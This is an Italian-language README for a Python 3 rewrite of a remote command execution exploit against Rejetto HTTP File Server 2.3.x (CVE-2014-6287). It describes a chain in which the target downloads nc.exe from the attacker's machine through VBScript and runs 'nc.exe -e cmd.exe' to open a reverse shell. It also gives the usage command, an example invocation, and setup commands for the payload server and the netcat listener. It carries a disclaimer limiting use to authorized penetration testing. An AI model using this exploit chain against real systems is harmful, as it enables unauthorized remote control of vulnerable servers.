
Exploit di esecuzione di comandi da remoto per Rejetto HTTP File Server 2.3.x (CVE-2014-6287) riscritto in Python 3 per test di sicurezza offensiva moderni.
Questa è una riscrittura in Python 3 del classico exploit di Esecuzione Remota di Comandi (RCE) che colpisce Rejetto HTTP File Server (HFS) v2.3.x, sfruttando la vulnerabilità identificata come CVE-2014-6287.
Originariamente scoperto da Avinash Kumar Thapa alias "-Acid", questa versione migliora portabilità e usabilità, fornendo parametrizzazione completa e compatibilità moderna.
Questo strumento è fornito esclusivamente per scopi educativi e test di penetrazione autorizzati. L'uso non autorizzato contro sistemi di cui non si possiede la proprietà o per i quali non si ha esplicita autorizzazione è illegale e non etico.
nc.exenc.exe utilizzando VBScriptnc.exenc.exe -e cmd.exe per stabilire una reverse shellpython3 exploit.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LISTEN_LOCAL_PORT> <NC_DOWNLOAD_PORT>
Example:
python3 exploit.py 192.168.1.10 80 192.168.1.5 4444 8000
Requirements:
- HTTP server serving nc.exe:
python3 -m http.server 8000
- Listener:
nc -lvnp 4444